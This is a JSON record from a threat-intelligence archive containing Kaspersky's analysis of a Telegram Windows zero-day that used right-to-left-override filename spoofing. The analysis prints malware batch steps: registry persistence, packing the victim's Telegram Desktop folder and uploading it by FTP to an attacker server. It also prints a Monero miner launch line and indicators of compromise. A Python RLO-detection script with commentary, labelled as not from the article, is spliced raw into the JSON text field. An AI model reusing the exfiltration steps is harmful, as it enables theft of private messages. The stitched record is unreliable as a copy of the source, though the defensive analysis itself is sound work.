{
	"id": "6f7a2744-54eb-4041-acac-60aeba55b839",
	"created_at": "2026-04-06T00:19:53.457358Z",
	"updated_at": "2026-04-10T03:22:10.485022Z",
	"deleted_at": null,
	"sha1_hash": "c16adad4e039d68e8b0c01b820d868d6ee4de322",
	"title": "Zero-day vulnerability in Telegram",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 722463,
	"plain_text": "Zero-day vulnerability in Telegram\r\nBy Alexey Firsh\r\nPublished: 2018-02-13 · Archived: 2026-04-05 16:08:11 UTC\r\nIn October 2017, we learned of a vulnerability in Telegram Messenger’s Windows client that was being exploited in the wild. It involves the use of a classic right-to-left override attack when a user sends files over the messenger service.\r\nRight-to-left override in a nutshell\r\nThe special non-printing right-to-left override (RLO) character reverses the display order of the characters that come after it in a string. In the Unicode character table it is U+202E; one legitimate use is when typing Arabic text. In an attack, this character is used to mislead the victim, typically in the displayed name and extension of an executable file: a piece of software vulnerable to this sort of attack will display the filename incompletely or in reverse, so the extension the user sees is not the extension the operating system acts on.\r\nLaunching an attack on Telegram\r\nBelow is an account of how this vulnerability was exploited in Telegram:\r\nThe cybercriminal prepares the malware to be sent in a message. For example, a JS file is renamed as follows:\r\nevil.js -\u003e photo_high_re*U+202E*gnp.js\r\nWhere *U+202E* is the RLO character, which makes Telegram display the remaining string gnp.js in reverse, so the name renders as photo_high_resj.png. Note that this operation does not change the actual file – it still has the extension *.js.\r\nThe attacker sends the message, and – surprise! – the recipient sees an incoming PNG image file instead of a JS file:\r\nWhen the user clicks on this file, the standard Windows security notification is displayed:\r\nhttps://securelist.com/zero-day-vulnerability-in-telegram/83800/\r\nPage 1 of 15\n\nImportantly, this notification is only displayed if it hasn’t been disabled in the system’s settings. 
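The filename trick described above, as an added example that is not code from the Securelist article: a Python checker that builds a spoofed name the same way the attackers did, renders it under the simplified model the article gives (everything after U+202E reversed), and flags any name whose displayed extension differs from the extension Windows actually acts on. It goes beyond the page in checking for every Unicode bidi control character, not only U+202E, and in also catching plain double-extension lures; the extension lists and the sample filenames are constructed here, with the IoC-style samples shaped after the article's own indicator names.

```python
# Added example, not from the Securelist article: detection of right-to-left
# override (RLO) filename spoofing as described above. Sample names below are
# constructed here; the 'name?gpj.exe' shapes follow the article's IoC list.
import os

RLO = chr(0x202E)  # RIGHT-TO-LEFT OVERRIDE, the character used in the attack

# Every Unicode bidi control character, not only RLO (this is broader than the
# page): embeddings/overrides (LRE, RLE, PDF, LRO, RLO), isolates (LRI, RLI,
# FSI, PDI) and the marks LRM/RLM. None of them belongs in a filename.
BIDI_CONTROLS = frozenset(
    [chr(c) for c in range(0x202A, 0x202F)]
    + [chr(c) for c in range(0x2066, 0x206A)]
    + [chr(0x200E), chr(0x200F)]
)

# What the victim is meant to think the file is, and what actually runs.
# Both lists are assumptions for this example, not taken from the article.
HARMLESS_LOOKING = {'png', 'jpg', 'jpeg', 'gif', 'bmp', 'pdf', 'txt', 'doc', 'docx'}
EXECUTABLE = {'exe', 'scr', 'js', 'jse', 'vbs', 'vbe', 'bat', 'cmd', 'com',
              'pif', 'hta', 'ps1', 'msi', 'lnk'}


def spoofed_name(visible_prefix, real_ext, fake_ext):
    # Build a name the way the attacker did. The text after the RLO is stored
    # reversed, so spoofed_name('photo_high_re', 'js', 'png') returns
    # 'photo_high_re' + RLO + 'gnp.js', which a vulnerable client renders as
    # 'photo_high_resj.png'. The real extension (.js) is untouched.
    return visible_prefix + RLO + fake_ext[::-1] + '.' + real_ext


def displayed_name(name):
    # The rendering model the article describes: an RLO reverses the visual
    # order of everything after it. A full bidi renderer is subtler (a later
    # U+202C would end the override), but this is what the victim saw here.
    head, sep, tail = name.partition(RLO)
    return head + tail[::-1] if sep else name


def extension(name):
    # The shell only cares about what follows the last dot in the stored name.
    return os.path.splitext(name)[1][1:].lower()


def sanitize_for_display(name, marker='?'):
    # What a hardened client should show instead: the control character made
    # visible and nothing reversed. The article's IoC list writes the names the
    # same way, e.g. 'name?gpj.exe'.
    return ''.join(marker if c in BIDI_CONTROLS else c for c in name)


def check_filename(name):
    # Classify one filename; returns the evidence so a caller can log or block.
    controls = sorted({c for c in name if c in BIDI_CONTROLS})
    real_ext = extension(name)
    shown_ext = extension(displayed_name(name))
    inner_ext = extension(os.path.splitext(name)[0])  # 'pdf' in report.pdf.exe
    reasons = []
    if controls:
        codes = ', '.join('U+%04X' % ord(c) for c in controls)
        reasons.append('bidi control character(s): ' + codes)
    if shown_ext != real_ext:
        reasons.append('displays as .' + shown_ext + ' but is really .' + real_ext)
    if real_ext in EXECUTABLE and shown_ext in HARMLESS_LOOKING:
        reasons.append('executable disguised as a harmless file type')
    if real_ext in EXECUTABLE and inner_ext in HARMLESS_LOOKING:
        reasons.append('double extension .' + inner_ext + '.' + real_ext)
    return {
        'name': name,
        'displayed': displayed_name(name),
        'safe_display': sanitize_for_display(name),
        'real_ext': real_ext,
        'shown_ext': shown_ext,
        'suspicious': bool(reasons),
        'reasons': reasons,
    }


def scan(names):
    # Return only the findings a responder needs to look at.
    return [r for r in (check_filename(n) for n in names) if r['suspicious']]


# Constructed sample input: the article's own example, two names shaped like its
# IoC entries, a benign image and a plain double-extension lure.
SAMPLE_NAMES = [
    spoofed_name('photo_high_re', 'js', 'png'),
    spoofed_name('name', 'exe', 'jpg'),
    spoofed_name('address', 'scr', 'jpg'),
    'holiday.jpg',
    'report.pdf.exe',
]

if __name__ == '__main__':
    for finding in scan(SAMPLE_NAMES):
        print(finding['safe_display'], '->', finding['displayed'], finding['reasons'])
```

The sanitize_for_display output is the form a hardened client should present: the control character made visible and the text never reversed, which is exactly how the IoC list at the end of this report writes the names (name?gpj.exe). Matching on the extension alone is not enough, because the stored name really does end in .js; the check has to compare what is rendered against what the shell will execute.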
If the user clicks on ‘Run’, the malicious file is launched.\r\nExploitation in the wild\r\nAfter learning of the vulnerability, we began to research cases where it was actually exploited. These cases fall into several general scenarios.\r\nRemote control\r\nThe aim of this sort of attack is to take control of the victim’s system; it involves the attacker studying the target system’s environment and installing additional modules.\r\nAttack flowchart\r\nAt the first stage, a downloader is sent to the target. It is written in .NET and uses the Telegram API as its command protocol:\r\nWith the bot token it embeds and the Telegram API, it is easy to find the Telegram bot via which the infected systems are controlled:\r\nWhen launched, it modifies a startup registry key to achieve persistence on the system and copies its executable file into one of several directories, depending on the environment:\r\nThen it begins to check every two seconds for commands arriving from the control bot. Note that the commands are implemented in Russian:\r\nThe list of supported commands shows that the bot can silently deploy arbitrary malicious tools like backdoors, loggers and other malware on the target system. 
A complete list of supported commands is given below, with the command strings written exactly as the bot matches them (the first group with a leading quotation mark, the second without):\r\nCommand (English translation) – Function\r\n“Онлайн (“Online) – Send list of files in directory to control bot.\r\n“Запус (“Launch) – Launch executable file using Process.Start().\r\n“Логгер (“Logger) – Check if tor process is running, download logg.zip, unpack it, delete the archive and launch its content.\r\n“Скачать (“Download) – Download file into its own directory.\r\n“Удалить (“Delete) – Delete file from its own directory.\r\n“Распаковать (“Unpack) – Unpack archive in its own directory using specified password.\r\nУбить (Kill) – Terminate specified process using process.Kill().\r\nСкачат (Download) – Same as ‘Download’ (see above), with different command parsing.\r\nЗапуск (Launch) – Same as ‘Launch’ (see above), with different command parsing.\r\nУдалить (Delete) – Same as ‘Delete’ (see above), with different command parsing.\r\nРаспаковать (Unpack) – Same as ‘Unpack’ (see above), with different command parsing.\r\nПроцессы (Processes) – Send a list of processes running on the target PC to control bot.\r\nAn analysis of these commands shows that this loader may be designed to download another piece of malware, possibly a logger that would spy on the victim user.\r\nMiners and more\r\nAmid the cryptocurrency boom, cybercriminals are increasingly moving away from ‘classic robbery’ to a new method of making money from their victims – namely mining cryptocurrency using the resources of an infected computer. 
All they have to do is run a mining client on the victim computer and specify the details of their cryptocurrency wallet.\r\nScenario #1\r\nAttack flowchart\r\nAt the first stage of the attack, an SFX archive with a script is used that launches an executable file:\r\nPath=%temp%\\adr\r\nSetup=%temp%\\adr\\run.exe\r\nSilent=1\r\nOverwrite=2\r\nThis run.exe file is in fact a BAT file. The batch script, after extraction, looks like this:\r\nAs we can see, the malicious program first opens a decoy file – in this case it is an image to lull the victim into a false sense of security.\r\nThen two miners are launched one after the other. They are installed as services with the help of the nssm.exe utility, which is contained in the same SFX archive.\r\nWe have seen several versions of this batch script, some of which have extra features:\r\nThis specific version disables Windows security features, then logs on to a malicious FTP server, downloads a payload and launches it. In this case, the payload was an SFX archive containing further miners and a Remote Manipulator System (RMS) client, an analog of TeamViewer. Using AutoIt scripts, the malware deploys RMS on the targeted computer for subsequent remote access:\r\nThe attack flowchart is approximately as follows:\r\nWe have examined this FTP server and found several more similar payloads, which are possibly loaded by other versions of this malware.\r\nThe file address4.exe is worthy of a special mention. 
Like the other files, it is an SFX archive with the following contents:\r\nAll components named st*.exe are executable PE files converted in a similar way from batch scripts.\r\nThe SFX script launches the component st1.exe:\r\nPath=%temp%/adress\r\nSetup=%temp%/adress/st1.exe\r\nSilent=1\r\nOverwrite=2\r\nst1.exe adds st2.exe to the system startup by writing the appropriate record to the system registry:\r\nreg add HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce /v RUN1 /d %temp%\\adress\\st2.exe /f\r\nSo the st2.exe file launches the next time the system is booted (the # comments annotate each step):\r\nTIMEOUT /T 10 /NOBREAK #Waits for Telegram to launch\r\nchcp 1251\r\ntskill telegram\r\ntaskkill /IM telegram.exe #Terminates Telegram processes\r\nmd %temp%\\sss\r\ncd %temp%\\sss #Creates a temporary directory\r\n“%temp%\\adress\\WinRAR.exe” A -ibck -inul -r -agYY-mm-dd-hh-mm-ss “%temp%\\sss\\1.rar” “%appdata%\\Telegram Desktop” #Packs the Telegram directory into a RAR archive\r\nTIMEOUT /T 60 /NOBREAK\r\n:begin\r\nping -n 1 ya.ru |\u003enul find /i “TTL=” \u0026\u0026 (start “” %temp%/adress/st3.exe) || (ping 127.1 -n 2\u0026 Goto :begin) #Checks Internet connection and launches st3.exe\r\nAs expected, st3.exe logs on to the malicious FTP server and uploads the RAR archive that was created earlier (the two redacted lines are the FTP user name and password):\r\n@echo XXXXXXXX\u003ecommand.txt\r\n@echo XXXXXXXX\u003e\u003ecommand.txt\r\n@echo binary\u003e\u003ecommand.txt\r\n@echo mput %temp%\\sss\\*.rar\u003e\u003ecommand.txt\r\n@echo quit\u003e\u003ecommand.txt\r\nftp -s:command.txt -i free11.beget.com\r\ndel command.txt\r\nattrib %temp%/adress +H\r\nattrib %temp%/adress\\* +H\r\nOn that FTP server, we discovered several archives of this type containing Telegram directories stolen from the victims:\r\nEach dump contains, as well as the Telegram client’s executables and utility files, an encrypted local cache containing different files used in personal communications: documents, videos, audio records and photos.\r\nScenario #2\r\nJust like in the previous scenario, an attack starts with an SFX archive opening and launching a VBScript that it contains. Its main job is to open a decoy image to distract the user, and then download and launch the payload:\r\nThe payload is an SFX archive with the following script:\r\nsvchost.vbs is a script controlling the launch of the miner csrs.exe, which mines with the CryptoNight algorithm. It monitors the task list; if it detects a task manager (taskmgr.exe, processhacker.exe) on that list, it terminates the miner’s process and re-launches it when the task manager is closed.\r\nThe script contains the appropriate comments:\r\nThe miner itself is launched as follows:\r\nWshShell.Run “csrs.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u XXXXXXXXX@yandex.ru -p x -dbg -1” \u0026 cores, 0\r\nThe pool address is associated with the cryptocurrency Monero.\r\nOn the server itself, in addition to the specified payload files, we found similar SFX archives with miners:\r\nConclusion\r\nIt appears that only Russian cybercriminals were aware of this vulnerability, with all the exploitation cases that we detected occurring in Russia. Also, while conducting detailed research of these attacks we discovered a lot of artifacts that pointed to involvement by Russian cybercriminals.\r\nWe don’t have exact information about how long and which versions of the Telegram products were affected by the vulnerability. What we do know is that its exploitation in Windows clients began in March 2017. 
We informed the Telegram developers of the problem, and the vulnerability no longer occurs in Telegram’s products.\r\nThis paper presents only those cases that were reported by Kaspersky Lab’s telemetry systems. The full scope and other methods of exploitation remain unknown.\r\nIoC\r\nMD5\r\nFirst stage\r\n650DDDE919F9E5B854F8C375D3251C21\r\nC384E62E483896799B38437E53CD9749\r\nFA391BEAAF8B087A332833E618ABC358\r\n52F7B21CCD7B1159908BCAA143E27945\r\nB1760E8581F6745CBFCBE76FBD0ACBFA\r\nA662D942F0E43474984766197288845B\r\nPayloads\r\nB9EEC74CA8B14F899837A6BEB7094F65\r\n46B36F8FF2369E883300F472694BBD4D\r\n10B1301EAB4B4A00E7654ECFA6454B20\r\nCD5C5423EC3D19E864B2AE1C1A9DDBBC\r\n7A3D9C0E2EA27F1B96AEFED2BF8971A4\r\nE89FDDB32D7EC98B3B68AB7681FACCFC\r\n27DDD96A87FBA2C15B5C971BA6EB80C6\r\n844825B1336405DDE728B993C6B52A83\r\nC6A795C27DEC3F5559FD65884457F6F3\r\n89E42CB485D65F71F62BC1B64C6BEC95\r\n0492C336E869A14071B1B0EF613D9899\r\n2CC9ECD5566C921D3876330DFC66FC02\r\n1CE28167436919BD0A8C1F47AB1182C4\r\nC2 servers\r\nhttp://nord.adr[.]com[.]ua/\r\nFilenames (‘?’ marks the position of the RLO character U+202E)\r\nname?gpj.exe\r\nname?gpj.rar\r\naddress?gpj.scr\r\naddress_?gpj.scr\r\nphotoadr?gepj.scr\r\nSource: https://securelist.com/zero-day-vulnerability-in-telegram/83800/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://securelist.com/zero-day-vulnerability-in-telegram/83800/"
	],
	"report_names": [
		"83800"
	],
	"threat_actors": [],
	"ts_created_at": 1775434793,
	"ts_updated_at": 1775791330,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c16adad4e039d68e8b0c01b820d868d6ee4de322.pdf",
		"text": "https://archive.orkl.eu/c16adad4e039d68e8b0c01b820d868d6ee4de322.txt",
		"img": "https://archive.orkl.eu/c16adad4e039d68e8b0c01b820d868d6ee4de322.jpg"
	}
}